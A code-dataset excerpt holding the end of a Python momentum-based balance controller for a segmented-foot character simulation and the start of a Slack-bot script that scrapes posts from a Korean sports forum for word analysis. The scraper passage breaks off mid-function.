viewer.objectInfoWnd.labelForceY.value(0)\n\n viewer.objectInfoWnd.labelForceZ = Fl_Value_Input(140, 30+offset*9, 40, 20, 'Z')\n viewer.objectInfoWnd.labelForceZ.value(1)\n\n viewer.objectInfoWnd.labelForceDur = Fl_Value_Input(220, 30+offset*9, 40, 20, 'Dur')\n viewer.objectInfoWnd.labelForceDur.value(0.1)\n\n viewer.objectInfoWnd.end()\n\n # self.sliderFm = Fl_Hor_Nice_Slider(10, 42+offset*6, 250, 10)\n\n def getParamVal(paramname):\n return viewer.objectInfoWnd.getVal(paramname)\n\n def getParamVals(paramnames):\n return (getParamVal(name) for name in paramnames)\n\n def setParamVal(paramname, val):\n viewer.objectInfoWnd.setVal(paramname, val)\n\n idDic = dict()\n for i in range(motion[0].skeleton.getJointNum()):\n idDic[motion[0].skeleton.getJointName(i)] = i\n\n # extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_1', 'Foot_foot_0_0_0', 'Foot_foot_0_1_0', 'Foot_foot_1_0']\n extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_0_0', 'Foot_foot_0_1_0', 'Foot_foot_1_0']\n lIDdic = {'Left'+name: motion[0].skeleton.getJointIndex('Left'+name) for name in extendedFootName}\n rIDdic = {'Right'+name: motion[0].skeleton.getJointIndex('Right'+name) for name in extendedFootName}\n footIdDic = lIDdic.copy()\n footIdDic.update(rIDdic)\n\n lIDlist = [motion[0].skeleton.getJointIndex('Left'+name) for name in extendedFootName]\n rIDlist = [motion[0].skeleton.getJointIndex('Right'+name) for name in extendedFootName]\n footIdlist = []\n footIdlist.extend(lIDlist)\n footIdlist.extend(rIDlist)\n\n foot_left_idx = motion[0].skeleton.getJointIndex('LeftFoot')\n foot_right_idx = motion[0].skeleton.getJointIndex('RightFoot')\n\n foot_left_idx_temp = motion[0].skeleton.getJointIndex('LeftFoot_foot_1_0')\n foot_right_idx_temp = motion[0].skeleton.getJointIndex('RightFoot_foot_1_0')\n\n # ik_solver = hik.numIkSolver(dartIkModel)\n # ik_solver.clear()\n\n # bodyIDsToCheck = rIDlist.copy()\n\n joint_names = [motion[0].skeleton.getJointName(i) for i in range(motion[0].skeleton.getJointNum())]\n\n def fix_dofs(_DOFs, nested_dof_values, _mcfg, _joint_names):\n fixed_nested_dof_values = list()\n fixed_nested_dof_values.append(nested_dof_values[0])\n for i in range(1, len(_DOFs)):\n dof = _DOFs[i]\n if dof == 1:\n node = _mcfg.getNode(_joint_names[i])\n axis = mm.unitZ()\n if node.jointAxes[0] == 'X':\n axis = mm.unitX()\n elif node.jointAxes[0] == 'Y':\n axis = mm.unitY()\n fixed_nested_dof_values.append(np.array([np.dot(nested_dof_values[i], axis)]))\n else:\n fixed_nested_dof_values.append(nested_dof_values[i])\n\n return fixed_nested_dof_values\n\n start_frame = 100\n\n up_vec_in_each_link = dict()\n for foot_id in footIdlist:\n up_vec_in_each_link[foot_id] = controlModel_ik.getBodyOrientationGlobal(foot_id)[1, :]\n controlModel_ik.set_q(controlModel.get_q())\n\n ###################################\n # simulate\n ###################################\n def simulateCallback(frame):\n # print(frame)\n # print(motion[frame].getJointOrientationLocal(footIdDic['RightFoot_foot_0_1_0']))\n if True:\n if frame == 200:\n if motionFile == 'wd2_tiptoe.bvh':\n setParamVal('tiptoe angle', 0.3)\n if motionFile == 'wd2_tiptoe_zygote.bvh':\n setParamVal('tiptoe angle', 0.3)\n # elif 210 < frame < 240:\n # if motionFile == 'wd2_tiptoe_zygote.bvh':\n # setParamVal('com Y offset', 0.01/30. * (frame-110))\n elif frame == 400:\n setParamVal('com Y offset', 0.)\n setParamVal('tiptoe angle', 0.)\n elif frame == 430:\n foot_viewer.check_all_seg()\n # setParamVal('SupKt', 30.)\n # elif frame == 400:\n # setParamVal('SupKt', 17.)\n\n\n # hfi.footAdjust(motion[frame], idDic, SEGMENT_FOOT_MAG=.03, SEGMENT_FOOT_RAD=.015, baseHeight=0.02)\n\n if abs(getParamVal('tiptoe angle')) > 0.001:\n tiptoe_angle = getParamVal('tiptoe angle')\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_0_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_0_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n # motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle * 0.95))\n # motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle * 0.95))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle))\n\n if getParamVal('left tilt angle') > 0.001:\n left_tilt_angle = getParamVal('left tilt angle')\n if motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1'], mm.exp(mm.unitZ(), -math.pi * left_tilt_angle))\n else:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1_0'], mm.exp(mm.unitZ(), -math.pi * left_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n\n elif getParamVal('left tilt angle') < -0.001:\n left_tilt_angle = getParamVal('left tilt angle')\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_0'], mm.exp(mm.unitZ(), -math.pi * left_tilt_angle))\n if motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n else:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1_0'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n\n if getParamVal('right tilt angle') > 0.001:\n right_tilt_angle = getParamVal('right tilt angle')\n if motion[0].skeleton.getJointIndex('RightFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1'], mm.exp(mm.unitZ(), math.pi * right_tilt_angle))\n else:\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1_0'], mm.exp(mm.unitZ(), math.pi * right_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n elif getParamVal('right tilt angle') < -0.001:\n right_tilt_angle = getParamVal('right tilt angle')\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_0'], mm.exp(mm.unitZ(), math.pi * right_tilt_angle))\n if motion[0].skeleton.getJointIndex('RightFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n # else:\n # motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1_0'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n\n motionModel.update(motion[frame])\n motionModel.translateByOffset(np.array([getParamVal('com X offset'), getParamVal('com Y offset'), getParamVal('com Z offset')]))\n controlModel_ik.set_q(controlModel.get_q())\n\n global g_initFlag\n global forceShowTime\n\n global JsysPre\n global JsupPreL\n global JsupPreR\n\n global JconstPre\n\n global preFootCenter\n global maxContactChangeCount\n global contactChangeCount\n global contact\n global contactChangeType\n\n Kt, Kl, Kh, Bl, Bh, kt_sup = getParamVals(['Kt', 'Kl', 'Kh', 'Bl', 'Bh', 'SupKt'])\n Dt = 2*(Kt**.5)\n Dl = 2*(Kl**.5)\n Dh = 2*(Kh**.5)\n dt_sup = 2*(kt_sup**.5)\n\n # tracking\n th_r = motion.getDOFPositions(frame)\n th = controlModel.getDOFPositions()\n dth_r = motion.getDOFVelocities(frame)\n dth = controlModel.getDOFVelocities()\n ddth_r = motion.getDOFAccelerations(frame)\n ddth_des = yct.getDesiredDOFAccelerations(th_r, th, dth_r, dth, ddth_r, Kt, Dt)\n\n # ype.flatten(fix_dofs(DOFs, ddth_des, mcfg, joint_names), ddth_des_flat)\n # ype.flatten(fix_dofs(DOFs, dth, mcfg, joint_names), dth_flat)\n ype.flatten(ddth_des, ddth_des_flat)\n ype.flatten(dth, dth_flat)\n\n #################################################\n # jacobian\n #################################################\n\n contact_des_ids = list() # desired contact segments\n if foot_viewer.check_om_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_0'))\n if foot_viewer.check_op_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_0_0'))\n if foot_viewer.check_im_l is not None and foot_viewer.check_im_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1'))\n if foot_viewer.check_ip_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1_0'))\n if foot_viewer.check_h_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_1_0'))\n\n if foot_viewer.check_om_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_0'))\n if foot_viewer.check_op_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_0_0'))\n if foot_viewer.check_im_r is not None and foot_viewer.check_im_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_1'))\n if foot_viewer.check_ip_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_1_0'))\n if foot_viewer.check_h_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_1_0'))\n\n contact_ids = list() # temp idx for balancing\n contact_ids.extend(contact_des_ids)\n\n contact_joint_ori = list(map(controlModel.getJointOrientationGlobal, contact_ids))\n contact_joint_pos = list(map(controlModel.getJointPositionGlobal, contact_ids))\n contact_body_ori = list(map(controlModel.getBodyOrientationGlobal, contact_ids))\n contact_body_pos = list(map(controlModel.getBodyPositionGlobal, contact_ids))\n contact_body_vel = list(map(controlModel.getBodyVelocityGlobal, contact_ids))\n contact_body_angvel = list(map(controlModel.getBodyAngVelocityGlobal, contact_ids))\n\n ref_joint_ori = list(map(motion[frame].getJointOrientationGlobal, contact_ids))\n ref_joint_pos = list(map(motion[frame].getJointPositionGlobal, contact_ids))\n ref_joint_vel = [motion.getJointVelocityGlobal(joint_idx, frame) for joint_idx in contact_ids]\n ref_joint_angvel = [motion.getJointAngVelocityGlobal(joint_idx, frame) for joint_idx in contact_ids]\n ref_body_ori = list(map(motionModel.getBodyOrientationGlobal, contact_ids))\n ref_body_pos = list(map(motionModel.getBodyPositionGlobal, contact_ids))\n # ref_body_vel = list(map(controlModel.getBodyVelocityGlobal, contact_ids))\n ref_body_angvel = [motion.getJointAngVelocityGlobal(joint_idx, frame) for joint_idx in contact_ids]\n ref_body_vel = [ref_joint_vel[i] + np.cross(ref_joint_angvel[i], ref_body_pos[i] - ref_joint_pos[i])\n for i in range(len(ref_joint_vel))]\n\n is_contact = [1] * len(contact_ids)\n contact_right = len(set(contact_des_ids).intersection(rIDlist)) > 0\n contact_left = len(set(contact_des_ids).intersection(lIDlist)) > 0\n\n contMotionOffset = th[0][0] - th_r[0][0]\n\n linkPositions = controlModel.getBodyPositionsGlobal()\n linkVelocities = controlModel.getBodyVelocitiesGlobal()\n linkAngVelocities = controlModel.getBodyAngVelocitiesGlobal()\n linkInertias = controlModel.getBodyInertiasGlobal()\n\n CM = yrp.getCM(linkPositions, linkMasses, totalMass)\n dCM = yrp.getCM(linkVelocities, linkMasses, totalMass)\n CM_plane = copy.copy(CM)\n CM_plane[1] = 0.\n dCM_plane = copy.copy(dCM)\n dCM_plane[1] = 0.\n\n P = ymt.getPureInertiaMatrix(TO, linkMasses, linkPositions, CM, linkInertias)\n dP = ymt.getPureInertiaMatrixDerivative(dTO, linkMasses, linkVelocities, dCM, linkAngVelocities, linkInertias)\n\n # calculate jacobian\n Jsys, dJsys = controlModel.computeCom_J_dJdq()\n J_contacts = [] # type: list[np.ndarray]\n dJ_contacts = [] # type: list[np.ndarray]\n for contact_id in contact_ids:\n J_contacts.append(Jsys[6*contact_id:6*contact_id + 6, :])\n dJ_contacts.append(dJsys[6*contact_id:6*contact_id + 6])\n\n # calculate footCenter\n footCenter = sum(contact_body_pos) / len(contact_body_pos) if len(contact_body_pos) > 0 \\\n else .5 * (controlModel.getBodyPositionGlobal(supL) + controlModel.getBodyPositionGlobal(supR))\n footCenter[1] = 0.\n # if len(contact_body_pos) > 2:\n # hull = ConvexHull(contact_body_pos)\n\n footCenter_ref = sum(ref_body_pos) / len(ref_body_pos) if len(ref_body_pos) > 0 \\\n else .5 * (motionModel.getBodyPositionGlobal(supL) + motionModel.getBodyPositionGlobal(supR))\n footCenter_ref = footCenter_ref + contMotionOffset\n # if len(ref_body_pos) > 2:\n # hull = ConvexHull(ref_body_pos)\n footCenter_ref[1] = 0.\n\n # footCenter[0] = footCenter[0] + getParamVal('com X offset')\n # footCenter[1] = footCenter[0] + getParamVal('com Y offset')\n # footCenter[2] = footCenter[2] + getParamVal('com Z offset')\n\n # initialization\n if g_initFlag == 0:\n preFootCenter[0] = footCenter.copy()\n g_initFlag = 1\n\n # if contactChangeCount == 0 and np.linalg.norm(footCenter - preFootCenter[0]) > 0.01:\n # contactChangeCount += 30\n if contactChangeCount > 0:\n # change footcenter gradually\n footCenter = preFootCenter[0] + (maxContactChangeCount - contactChangeCount)*(footCenter-preFootCenter[0])/maxContactChangeCount\n else:\n preFootCenter[0] = footCenter.copy()\n\n # linear momentum\n # TODO:\n # We should consider dCM_ref, shouldn't we?\n # add getBodyPositionGlobal and getBodyPositionsGlobal in csVpModel!\n # to do that, set joint velocities to vpModel\n CM_ref_plane = footCenter\n # CM_ref_plane = footCenter_ref\n CM_ref = footCenter + np.array([getParamVal('com X offset'), motionModel.getCOM()[1] + getParamVal('com Y offset'), getParamVal('com Z offset')])\n dL_des_plane = Kl * totalMass * (CM_ref - CM) - Dl * totalMass * dCM\n # dL_des_plane = Kl * totalMass * (CM_ref_plane - CM_plane) - Dl * totalMass * dCM_plane\n # dL_des_plane[1] = 0.\n # print('dCM_plane : ', np.linalg.norm(dCM_plane))\n\n # angular momentum\n CP_ref = footCenter\n # CP_ref = footCenter_ref\n bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n CP = yrp.getCP(contactPositions, contactForces)\n if CP_old[0] is None or CP is None:\n dCP = None\n else:\n dCP = (CP - CP_old[0])/(1/30.)\n CP_old[0] = CP\n\n if CP is not None and dCP is not None:\n ddCP_des = Kh*(CP_ref - CP) - Dh * dCP\n dCP_des = dCP + ddCP_des * (1/30.)\n CP_des = CP + dCP_des * (1/30.)\n # CP_des = footCenter\n CP_des = CP + dCP*(1/30.) + .5*ddCP_des*((1/30.)**2)\n dH_des = np.cross((CP_des - CM), (dL_des_plane + totalMass * mm.s2v(wcfg.gravity)))\n if contactChangeCount > 0: # and contactChangeType == 'DtoS':\n dH_des *= (maxContactChangeCount - contactChangeCount)/maxContactChangeCount\n else:\n dH_des = None\n\n # convex hull\n contact_pos_2d = np.asarray([np.array([contactPosition[0], contactPosition[2]]) for contactPosition in contactPositions])\n p = np.array([CM_plane[0], CM_plane[2]])\n # hull = None # type: Delaunay\n # if contact_pos_2d.shape[0] > 0:\n # hull = Delaunay(contact_pos_2d)\n # print(hull.find_simplex(p) >= 0)\n\n # set up equality constraint\n # TODO:\n # logSO3 is just q'', not acceleration.\n # To make a_oris acceleration, q'' -> a will be needed\n # body_ddqs = list(map(mm.logSO3, [mm.getSO3FromVectors(np.dot(body_ori, mm.unitY()), mm.unitY()) for body_ori in contact_body_ori]))\n # body_ddqs = list(map(mm.logSO3, [np.dot(contact_body_ori[i].T, np.dot(ref_body_ori[i], mm.getSO3FromVectors(np.dot(ref_body_ori[i], mm.unitY()), mm.unitY()))) for i in range(len(contact_body_ori))]))\n body_ddqs = list(map(mm.logSO3, [np.dot(contact_body_ori[i].T, np.dot(ref_body_ori[i], mm.getSO3FromVectors(np.dot(ref_body_ori[i], up_vec_in_each_link[contact_ids[i]]), mm.unitY()))) for i in range(len(contact_body_ori))]))\n body_qs = list(map(mm.logSO3, contact_body_ori))\n body_angs = [np.dot(contact_body_ori[i], contact_body_angvel[i]) for i in range(len(contact_body_ori))]\n body_dqs = [mm.vel2qd(body_angs[i], body_qs[i]) for i in range(len(body_angs))]\n a_oris = [np.dot(contact_body_ori[i], mm.qdd2accel(body_ddqs[i], body_dqs[i], body_qs[i])) for i in range(len(contact_body_ori))]\n a_oris = list(map(mm.logSO3, [np.dot(np.dot(ref_body_ori[i], mm.getSO3FromVectors(np.dot(ref_body_ori[i], up_vec_in_each_link[contact_ids[i]]), mm.unitY())), contact_body_ori[i].T) for i in range(len(contact_body_ori))]))\n\n # body_ddq = body_ddqs[0]\n # body_ori = contact_body_ori[0]\n # body_ang = np.dot(body_ori.T, contact_body_angvel[0])\n #\n # body_q = mm.logSO3(body_ori)\n # body_dq = mm.vel2qd(body_ang, body_q)\n # a_ori = np.dot(body_ori, mm.qdd2accel(body_ddq, body_dq, body_q))\n\n KT_SUP = np.diag([kt_sup/5., kt_sup, kt_sup/5.])\n\n # a_oris = list(map(mm.logSO3, [mm.getSO3FromVectors(np.dot(body_ori, mm.unitY()), mm.unitY()) for body_ori in contact_body_ori]))\n # a_sups = [np.append(kt_sup*(ref_body_pos[i] - contact_body_pos[i] + contMotionOffset) + dt_sup*(ref_body_vel[i] - contact_body_vel[i]),\n # kt_sup*a_oris[i]+dt_sup*(ref_body_angvel[i]-contact_body_angvel[i])) for i in range(len(a_oris))]\n # a_sups = [np.append(kt_sup*(ref_body_pos[i] - contact_body_pos[i] + contMotionOffset) - dt_sup * contact_body_vel[i],\n # kt_sup*a_oris[i] - dt_sup * contact_body_angvel[i]) for i in range(len(a_oris))]\n a_sups = [np.append(np.dot(KT_SUP, (ref_body_pos[i] - contact_body_pos[i] + contMotionOffset)) - dt_sup * contact_body_vel[i],\n kt_sup*a_oris[i] - dt_sup * contact_body_angvel[i]) for i in range(len(a_oris))]\n\n # momentum matrix\n RS = np.dot(P, Jsys)\n R, S = np.vsplit(RS, 2)\n\n # rs = np.dot((np.dot(dP, Jsys) + np.dot(P, dJsys)), dth_flat)\n rs = np.dot(dP, np.dot(Jsys, dth_flat)) + np.dot(P, dJsys)\n r_bias, s_bias = np.hsplit(rs, 2)\n\n #######################################################\n # optimization\n #######################################################\n # if contact == 2 and footCenterR[1] > doubleTosingleOffset/2:\n if contact_left and not contact_right:\n config['weightMap']['RightUpLeg'] = .8\n config['weightMap']['RightLeg'] = .8\n config['weightMap']['RightFoot'] = .8\n else:\n config['weightMap']['RightUpLeg'] = .1\n config['weightMap']['RightLeg'] = .25\n config['weightMap']['RightFoot'] = .2\n\n # if contact == 1 and footCenterL[1] > doubleTosingleOffset/2:\n if contact_right and not contact_left:\n config['weightMap']['LeftUpLeg'] = .8\n config['weightMap']['LeftLeg'] = .8\n config['weightMap']['LeftFoot'] = .8\n else:\n config['weightMap']['LeftUpLeg'] = .1\n config['weightMap']['LeftLeg'] = .25\n config['weightMap']['LeftFoot'] = .2\n\n w = mot.getTrackingWeight(DOFs, motion[0].skeleton, config['weightMap'])\n\n mot.addTrackingTerms(problem, totalDOF, Bt, w, ddth_des_flat)\n if dH_des is not None:\n mot.addLinearTerms(problem, totalDOF, Bl, dL_des_plane, R, r_bias)\n mot.addAngularTerms(problem, totalDOF, Bh, dH_des, S, s_bias)\n\n if True:\n for c_idx in range(len(contact_ids)):\n mot.addConstraint2(problem, totalDOF, J_contacts[c_idx], dJ_contacts[c_idx], dth_flat, a_sups[c_idx])\n\n if contactChangeCount > 0:\n contactChangeCount = contactChangeCount - 1\n if contactChangeCount == 0:\n maxContactChangeCount = 30\n contactChangeType = 0\n\n r = problem.solve()\n problem.clear()\n ddth_sol_flat = np.asarray(r['x'])\n # ddth_sol_flat[foot_seg_dofs] = np.array(ddth_des_flat)[foot_seg_dofs]\n ype.nested(ddth_sol_flat, ddth_sol)\n\n rootPos[0] = controlModel.getBodyPositionGlobal(selectedBody)\n localPos = [[0, 0, 0]]\n\n for i in range(stepsPerFrame):\n # apply penalty force\n bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n # bodyIDs, contactPositions, contactPositionLocals, contactForces, contactVelocities = vpWorld.calcManyPenaltyForce(0, bodyIDsToCheck, mus, Ks, Ds)\n vpWorld.applyPenaltyForce(bodyIDs, contactPositionLocals, contactForces)\n\n controlModel.setDOFAccelerations(ddth_sol)\n # controlModel.setDOFAccelerations(ddth_des)\n # controlModel.set_ddq(ddth_sol_flat)\n # controlModel.set_ddq(ddth_des_flat)\n controlModel.solveHybridDynamics()\n\n if forceShowTime > viewer.objectInfoWnd.labelForceDur.value():\n forceShowTime = 0\n viewer_ResetForceState()\n\n forceforce = np.array([viewer.objectInfoWnd.labelForceX.value(), viewer.objectInfoWnd.labelForceY.value(), viewer.objectInfoWnd.labelForceZ.value()])\n extraForce[0] = getParamVal('Fm') * mm.normalize2(forceforce)\n if viewer_GetForceState():\n forceShowTime += wcfg.timeStep\n vpWorld.applyPenaltyForce(selectedBodyId, localPos, extraForce)\n\n vpWorld.step()\n\n controlModel_ik.set_q(controlModel.get_q())\n\n\n # rendering\n bodyIDs, geomIDs, positionLocalsForGeom = vpWorld.getContactInfoForcePlate(bodyIDsToCheck)\n for foot_seg_id in footIdlist:\n control_model_renderer.body_colors[foot_seg_id] = (255, 240, 255)\n control_model_renderer.geom_colors[foot_seg_id] = [(255, 240, 255)] * controlModel.getBodyGeomNum(foot_seg_id)\n\n for i in range(len(geomIDs)):\n control_model_renderer.geom_colors[bodyIDs[i]][geomIDs[i]] = (255, 0, 0)\n # for foot_seg_id in footIdlist:\n # control_model_renderer.body_colors[foot_seg_id] = (255, 240, 255)\n #\n # for contact_id in contact_ids:\n # control_model_renderer.body_colors[contact_id] = (255, 0, 0)\n\n\n rd_footCenter[0] = footCenter\n rd_footCenter_ref[0] = footCenter_ref\n\n rd_CM[0] = CM\n\n rd_CM_plane[0] = CM.copy()\n rd_CM_plane[0][1] = 0.\n\n if CP is not None and dCP is not None:\n rd_CP[0] = CP\n rd_CP_des[0] = CP_des\n\n rd_dL_des_plane[0] = [dL_des_plane[0]/100, dL_des_plane[1]/100, dL_des_plane[2]/100]\n rd_dH_des[0] = dH_des\n\n rd_grf_des[0] = dL_des_plane - totalMass * mm.s2v(wcfg.gravity)\n\n del rd_foot_ori[:]\n del rd_foot_pos[:]\n # for seg_foot_id in footIdlist:\n # rd_foot_ori.append(controlModel.getJointOrientationGlobal(seg_foot_id))\n # rd_foot_pos.append(controlModel.getJointPositionGlobal(seg_foot_id))\n rd_foot_ori.append(controlModel.getJointOrientationGlobal(supL))\n rd_foot_ori.append(controlModel.getJointOrientationGlobal(supR))\n rd_foot_pos.append(controlModel.getJointPositionGlobal(supL))\n rd_foot_pos.append(controlModel.getJointPositionGlobal(supR))\n\n rd_root_des[0] = rootPos[0]\n rd_root_ori[0] = controlModel.getBodyOrientationGlobal(0)\n rd_root_pos[0] = controlModel.getBodyPositionGlobal(0)\n\n del rd_CF[:]\n del rd_CF_pos[:]\n for i in range(len(contactPositions)):\n rd_CF.append(contactForces[i]/400)\n rd_CF_pos.append(contactPositions[i].copy())\n\n if viewer_GetForceState():\n rd_exfen_des[0] = [extraForce[0][0]/100, extraForce[0][1]/100, extraForce[0][2]/100]\n rd_exf_des[0] = [0, 0, 0]\n else:\n rd_exf_des[0] = [extraForce[0][0]/100, extraForce[0][1]/100, extraForce[0][2]/100]\n rd_exfen_des[0] = [0, 0, 0]\n\n extraForcePos[0] = controlModel.getBodyPositionGlobal(selectedBody)\n\n # render contact_ids\n\n # render skeleton\n if SKELETON_ON:\n Ts = dict()\n Ts['pelvis'] = controlModel.getJointTransform(idDic['Hips'])\n Ts['thigh_R'] = controlModel.getJointTransform(idDic['RightUpLeg'])\n Ts['shin_R'] = controlModel.getJointTransform(idDic['RightLeg'])\n Ts['foot_R'] = controlModel.getJointTransform(idDic['RightFoot'])\n Ts['foot_heel_R'] = controlModel.getJointTransform(idDic['RightFoot'])\n Ts['heel_R'] = np.eye(4)\n Ts['outside_metatarsal_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_0'])\n Ts['outside_phalanges_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_0_0'])\n # Ts['inside_metatarsal_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_1'])\n Ts['inside_metatarsal_R'] = np.eye(4)\n Ts['inside_phalanges_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_1_0'])\n Ts['spine_ribs'] = controlModel.getJointTransform(idDic['Spine'])\n Ts['head'] = controlModel.getJointTransform(idDic['Spine1'])\n Ts['upper_limb_R'] = controlModel.getJointTransform(idDic['RightArm'])\n Ts['lower_limb_R'] = controlModel.getJointTransform(idDic['RightForeArm'])\n Ts['thigh_L'] = controlModel.getJointTransform(idDic['LeftUpLeg'])\n Ts['shin_L'] = controlModel.getJointTransform(idDic['LeftLeg'])\n Ts['foot_L'] = controlModel.getJointTransform(idDic['LeftFoot'])\n Ts['foot_heel_L'] = controlModel.getJointTransform(idDic['LeftFoot'])\n Ts['heel_L'] = np.eye(4)\n Ts['outside_metatarsal_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_0'])\n Ts['outside_phalanges_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_0_0'])\n # Ts['inside_metatarsal_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_1'])\n Ts['inside_metatarsal_L'] = np.eye(4)\n Ts['inside_phalanges_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_1_0'])\n Ts['upper_limb_L'] = controlModel.getJointTransform(idDic['LeftArm'])\n Ts['lower_limb_L'] = controlModel.getJointTransform(idDic['LeftForeArm'])\n\n skeleton_renderer.appendFrameState(Ts)\n\n def postFrameCallback_Always(frame):\n if foot_viewer is not None:\n foot_viewer.foot_pressure_gl_window.refresh_foot_contact_info(frame, vpWorld, bodyIDsToCheck, mus, Ks, Ds)\n foot_viewer.foot_pressure_gl_window.goToFrame(frame)\n\n viewer.setPostFrameCallback_Always(postFrameCallback_Always)\n viewer.setSimulateCallback(simulateCallback)\n viewer.startTimer(1/30.)\n # viewer.play()\n viewer.show()\n\n foot_viewer = FootWindow(viewer.x() + viewer.w() + 20, viewer.y(), 300, 500, 'foot contact modifier', controlModel)\n foot_viewer.show()\n foot_viewer.check_op_l.value(True)\n foot_viewer.check_ip_l.value(True)\n foot_viewer.check_op_r.value(True)\n foot_viewer.check_ip_r.value(True)\n viewer.motionViewWnd.goToFrame(0)\n\n Fl.run()\n\n\nmain()\n","sub_path":"MomentumProject/foot_example_segfoot_constraint/main_MomentumProject_working_ik_tiptoe_real_joint.py","file_name":"main_MomentumProject_working_ik_tiptoe_real_joint.py","file_ext":"py","file_size_in_byte":42658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"385650749","text":"#슬랙봇\nfrom slackclient import SlackClient\nimport urllib.request\nfrom bs4 import BeautifulSoup\nfrom konlpy.tag import Twitter\nimport time\nfrom konlpy.corpus import kolaw\nfrom konlpy.utils import pprint\nfrom collections import Counter\nimport os\nimport random\nfrom multiprocessing import Pool,Manager\nfrom matplotlib import pyplot as plt\nfrom matplotlib import font_manager, rc\nfont_name = font_manager.FontProperties(fname=\"c:/Windows/Fonts/malgun.ttf\").get_name()\nrc('font', family=font_name)\n\ndef mlbparkCrawl(pageNumber):\n doct=[]\n # print(str(pageNumber)+' 번입장')\n with urllib.request.urlopen(\"http://mlbpark.donga.com/mp/b.php?p=\"+str(pageNumber)+\"&m=list&b=bullpen&query=&select=&user=\") as url:\n content = url.read()\n soup = BeautifulSoup(content, 'html.parser') \n bullpen = soup.find_all('a')\n resp = []\n idx = 0\n for s in bullpen: \n try:\n prop =s.get('class')\n if prop != None and prop[0] == \"bullpenbox\": # if class property exist, check icon_pic_n print(\"%s : %s\" % (s.get('href'), s.get_text()))\n resp.append(s.get('href'))\n idx += 1\n doct.append(s.find('span',{'class':'bullpen'}).get_text())\n doct.append(s.find('span',{'class':'bullpen'}).get_text())\n doct.append(s.find('span',{'class':'bullpen'}).get_text())\n doct.append(s.find('span',{'class':'bullpen'}).get_text())\n doct.append(s.find('span',{'class':'bullpen'}).get_text()) \n except UnicodeEncodeError: \n print(\"Errror : %d\" % (idx)) \n ar_count=0\n for link in resp:\n try:\n with urllib.request.urlopen(link) as url:\n content = url.read()\n soup = BeautifulSoup(content, 'html.parser') \n ar_txt = soup.find('div',{'class':'ar_txt'}) \n ar_count += 1\n if ar_txt.get_text() != None: \n doct.append(ar_txt.get_text())\n except:\n 